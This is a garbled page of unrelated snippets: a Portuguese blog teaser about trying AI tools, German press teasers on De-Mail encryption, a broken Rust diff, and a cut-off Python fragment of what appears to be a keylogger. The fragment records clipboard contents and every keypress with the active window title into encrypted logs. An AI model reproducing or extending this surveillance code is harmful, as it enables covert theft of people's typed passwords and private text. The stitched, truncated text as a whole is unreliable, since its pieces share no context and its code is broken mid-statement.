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Ler Mais 20/11/2024 | reflexões Executando um A pouco tempo comecei me interessar pelo uso de inteligência artificial, apenas por curiosidade. E por isso comecei a testar algumas tecnologias como geradores de textos, criadores de legendas e geradores de vozes. Porém, ficar refém de uma empres ...
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= last_text: last_text = text encrypted_message = encrypt_message(f "Clipboard changed: {text}") logging.info(encrypted_message) except Exception as e: print(f "Clipboard logging error: {e}") time.sleep(5) def on_press(key): try: message = f "Key pressed: {key.char} | Active window: {get_active_window()}" except AttributeError: message = f "Special key pressed: {key} | Active window: {get_active_window()}" encrypted_message =...
Die fehlende Ende-zu-Ende Verschlüsselung bei De-Mail diene dazu „eine Abhör-Hintertür für ... 03.03.2013 Post mit End-to-end Verschlüsselung Kategorie: presse/unsere-themen-in-der-presse Neuer E-Post-Brief bald mit End-to-End-Verschlüsselung End-to-end Verschlüsselung gibt es seit 20 Jahren. Trotzdem wurde DE-Mail so konstruiert, dass an jedem Knotenpunkt (Provider) ... 22.12.2012 Facebook testet 1$ Nachrichten Kategorie: presse/unsere-themen-in-der-presse E-Mail Versand...
= 200 { return Ok ( None ) ; } @ -261,36 +264,40 @@ async fn parse_iframe(client: reqwest::Client, url: &str) -> Result<Option<struc Ok ( Event :: Text ( e ) ) = > { let text = match reader . decode ( e . escaped ( ) ) { Ok ( text ) = > text , Err ( _ ) = > continue Err ( _ ) = > continue , } ; for i in text . split ( '\n' ) { let i = i . trim ( ) ; if !